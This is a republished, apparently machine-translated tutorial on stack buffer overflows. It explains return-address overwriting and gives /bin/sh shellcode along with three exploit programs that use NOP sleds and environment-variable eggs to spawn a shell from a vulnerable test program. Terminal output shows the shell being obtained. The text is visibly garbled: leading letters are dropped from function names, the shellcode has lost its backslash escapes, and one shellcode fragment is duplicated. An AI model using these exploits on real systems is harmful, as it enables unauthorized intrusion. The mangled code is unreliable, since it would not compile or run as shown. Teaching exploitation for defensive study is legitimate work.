Learn about Buffer Overflow from scratch

Source: Internet
Author: User

Learn about Buffer Overflow from scratch

Author: Wendy

In this guide, we will discuss what is buffer overflow and how to use it. You must understand C and assembly languages. If you are familiar with GDB, this is not necessary.

Memory is divided into three parts:

1. Text area (ProgramArea)

This part is used to store program commands. Therefore, this area is marked as read-only, and any write operation will cause errors.

2. Data Region

This part stores static variables, whose size can be changed by the BRK () System Call.

3. Stack

A stack has a special attribute, that is, the latest in it, which will be the first to be removed from the stack. In computer science, this is what we usually refer to as lifo ). Stacks are designed for functions and processes. A process changes the execution process of the program during execution, which is a bit similar to jump. but unlike jump, it returns the call point after its command is completed, and the return address is set in the stack before the process is called.

It is also used to dynamically allocate variables in the function, as well as the parameters and return values of the function.

Return address and command pointer

The computer executes a command and retains the pointer (IP) pointing to the next command ). When a function or process is called, the previously reserved first-come instruction pointer in the stack will be used as the return address (RET ). After the process is completed, RET will replace the IP address, and the program will continue to execute the original process.

One Buffer Overflow

Let's use an example to illustrate the buffer overflow below.

Lt; ++> buffer/example. c
Void main (){
Char big_string [100];
Char small_string [50];
Memset (big_string, 0x41,100 );
/* Strcpy (char * To, char * From )*/
Trcpy (small_string, big_string );}
Lt; --> End of example. c
 
This program uses two arrays, memset () to add the character 0x41 (= A) to the array big_strings ). Then it adds big_string to small_string. Obviously, the array small_string cannot contain 100 characters. Therefore, overflow is generated.

Next let's take a look at the changes in the memory:

[Big_string] [small_string] [SFP] [RET]

During overflow, both the stack frame pointer Stack pointer and RET return address will be overwritten by. This means that RET will be changed to 0x41414141 (0x41 is the hexadecimal value of ). When the function is returned, the instruction pointer (Instruction Pointer) will be replaced by the ret that has been rewritten. Then, the computer tries to execute the command at 0x41414141. This will cause a segment conflict because the address is out of the processing range.

Discover vulnerabilities

Now we know that we can change the normal process of the program by overwriting ret. we can experiment with it. Instead of using a to overwrite, we use some special addresses for our purposes.

ArbitraryCodeExecution

Now we need something to point to the address and execute it. In most cases, we need to generate a shell. Of course this is not the only method.

Before:
Fffff bbbbbbbbbbbbbbbbbbbbbbbbb eeee RRRR ffffffffff
B = the buffer
E = stack frame pointer
R = return address
F = Other data
After:
Fffff sssssssssssssssssssssssssssssssssaaaaaafffffffff
S = shellcode
A = address pointing to the shellcode
F = Other data

The code for using C to generate shell is as follows:

Lt; ++> buffer/shell. c
Void main (){
Char * name [2];
Ame [0] = "/bin/sh ";
Ame [1] = 0x0;
Execve (name [0], name, 0x0 );
Exit (0 );
}
Lt; --> end of shellcode
 
Here we will not explain how to write a shellcode, because it requires a lot of Assembly knowledge. That will deviate from the question we are discussing. In fact, many shellcodes can be used by us. For those who want to know how to generate it, follow these steps:

-Use the-static flag switch to compile the above program

-Use GDB to open the above program and run the "Disassemble main" command.

-Remove all unnecessary code

-Rewrite it with Assembly

-Compile the program and use GDB to open the program. Run the "Disassemble main" command.

-Use the X/BX command at the command address to retrieve hex-code.

Or you can use the code

Char shellcode [] =
"Xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"X89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"X80xe8xdcxffxffxff/bin/sh ";
"X89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"X80xe8xdcxffxffxff/bin/sh ";

Find the address

When we try to overflow the buffer of a program, this program will look for the buffer address. The answer to this question is: for every program, the stack starts at the same address. So long as we know where the stack address is, we can guess the buffer address.

The following program will tell us the stack pointer of this program:

Lt; ++> buffer/getsp. c
Unsigned long get_sp (void ){
_ ASM _ ("movl % ESP, % eax );
}
Void main (){
Fprintf (stdout, "0x % XN", get_sp ());
}
Lt; --> end of getsp. c

Try the following example:

Lt; ++> buffer/hole. c
Void main (INT argc, char ** argv []) {
Char buffer [512];
If (argc> 1)/* Otherwise we crash our little program */
Trcpy (buffer, argv [1]);
}
Lt; --> end of hole. c
Lt; ++> buffer/exploit1.c
# Include <stdlib. h>
# Define default_offset 0
# Define default_buffer_size 512
Char shellcode [] =
"Xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"X89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"X80xe8xdcxffxffxff/bin/sh ";
Unsigned long get_sp (void ){
_ ASM _ ("movl % ESP, % eax ");
}
Void main (INT argc, char * argv [])
{
Char * buff, * PTR;
Long * addr_ptr, ADDR;
Int offset = default_offset, bsize = default_buffer_size;
Int I;
If (argc> 1) bsize = atoi (argv [1]);
If (argc> 2) offset = atoi (argv [2]);
If (! (Buff = malloc (bsize ))){
Rintf ("can't allocate memory. N ");
Exit (0 );
}
ADDR = get_sp ()-offset;
Rintf ("Using address: 0x % XN", ADDR );
Tr = Buff;
Addr_ptr = (long *) PTR;
For (I = 0; I <bsize; I + = 4)
* (Addr_ptr ++) = ADDR;
Tr + = 4;
For (I = 0; I <strlen (shellcode); I ++)
* (PTR ++) = shellcode [I];
Uff [bsize-1] = '0 ';
Memcpy (buff, "Buf =", 4 );
Utenv (buff );
Ystem ("/bin/bash ");
}
Lt; --> end of exploit1.c

Now we can guess the offset (bufferaddress = stackpointer + offset ).

[Hosts] $ exploit1 600

Using address: 0xbffff6c3

[Hosts] $./hole $ Buf

[Hosts] $ exploit1 600 100

Using address: 0xbffffce6

[Hosts] $./hole $ Buf

Egmentation fault

Etc.

Etc.

As you know, this process is almost impossible, so we have to guess more precise overflow addresses. To increase our chances, we can add the Nop (null operation) command before our Buffer Overflow Shellcode. Because we do not have to guess its exact overflow address. The NOP command is used to delay execution. If this overwritten return address pointer is in the NOP string, our code can be executed in the following step.

The content of the memory should be as follows:

Fffff nnnnnnnnnnnssssssssssssssssaaaaaafffffffff

N = NOP

S = shellcode

A = address pointing to the shellcode

F = Other data

We changed the original code.

Lt; ++> buffer/exploit2.c
# Include <stdlib. h>
# Define default_offset 0
# Define default_buffer_size 512
# Define NOP 0x90
Char shellcode [] =
"Xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"X89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"X80xe8xdcxffxffxff/bin/sh ";
Unsigned long get_sp (void ){
_ ASM _ ("movl % ESP, % eax ");
}
Void main (INT argc, char * argv [])
{
Char * buff, * PTR;
Long * addr_ptr, ADDR;
Int offset = default_offset, bsize = default_buffer_size;
Int I;
If (argc> 1) bsize = atoi (argv [1]);
If (argc> 2) offset = atoi (argv [2]);
If (! (Buff = malloc (bsize ))){
Rintf ("can't allocate memory. N ");
Exit (0 );
}
ADDR = get_sp ()-offset;
Rintf ("Using address: 0x % XN", ADDR );
Tr = Buff;
Addr_ptr = (long *) PTR;
For (I = 0; I <bsize; I + = 4)
* (Addr_ptr ++) = ADDR;
For (I = 0; I <bsize/2; I ++)
Uff [I] = NOP;
Tr = buff + (bsize/2)-(strlen (shellcode)/2 ));
For (I = 0; I <strlen (shellcode); I ++)
* (PTR ++) = shellcode [I];
Uff [bsize-1] = '0 ';
Memcpy (buff, "Buf =", 4 );
Utenv (buff );
Ystem ("/bin/bash ");
}
Lt; --> end of exploit2.c
[Hosts] $ exploit2 600
Using address: 0xbffff6c3
[Hosts] $./hole $ Buf
Egmentation fault
[Hosts] $ exploit2 600 100
Using address: 0xbffffce6
[Hosts] $./hole $ Buf
# Exit
[Hosts] $

To improve our code, we put the shellcode in the environment variable. Then we can use the address of this variable to overflow the buffer. This method can increase our chances. Use the setenv () function to call and send shellcode to the environment variable.

Lt; ++> buffer/exploit3.c
# Include <stdlib. h>
# Define default_offset 0
# Define default_buffer_size 512
# Define default_egg_size 2048
# Define NOP 0x90
Char shellcode [] =
"Xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"X89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"X80xe8xdcxffxffxff/bin/sh ";
Unsigned long get_esp (void ){
_ ASM _ ("movl % ESP, % eax ");
}
Void main (INT argc, char * argv [])
{
Char * buff, * PTR, * egg;
Long * addr_ptr, ADDR;
Int offset = default_offset, bsize = default_buffer_size;
Int I, eggsize = default_egg_size;
If (argc> 1) bsize = atoi (argv [1]);
If (argc> 2) offset = atoi (argv [2]);
If (argc> 3) eggsize = atoi (argv [3]);
If (! (Buff = malloc (bsize ))){
Rintf ("can't allocate memory. N ");
Exit (0 );
}
If (! (Egg = malloc (eggsize ))){
Rintf ("can't allocate memory. N ");
Exit (0 );
}
ADDR = get_esp ()-offset;
Rintf ("Using address: 0x % XN", ADDR );
Tr = Buff;
Addr_ptr = (long *) PTR;
For (I = 0; I <bsize; I + = 4)
* (Addr_ptr ++) = ADDR;
Tr = egg;
For (I = 0; I <eggsize-strlen (shellcode)-1; I ++)
* (PTR ++) = NOP;
For (I = 0; I <strlen (shellcode); I ++)
* (PTR ++) = shellcode [I];
Uff [bsize-1] = '0 ';
Egg [eggsize-1] = '0 ';
Memcpy (egg, "Buf =", 4 );
Utenv (EGG );
Memcpy (buff, "ret =", 4 );
Utenv (buff );
Ystem ("/bin/bash ");
}
End of exploit3.c
[Hosts] $ exploit2 600
Using address: 0xbffff5d7
[Hosts] $./hole $ RET
# Exit
[Hosts] $

Search for Overflow

Of course, there is a more accurate way to find buffer overflow, that is, read its source program. Because Linux is an open system, you can easily obtain its source program.

Search for library function calls without border verification, such:

Trcpy (), strcat (), sprintf (), vsprintf (), scanf ()

Other dangerous functions, such as GETC (), getchar (), and strncat, are incorrectly used in the "when" loop.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.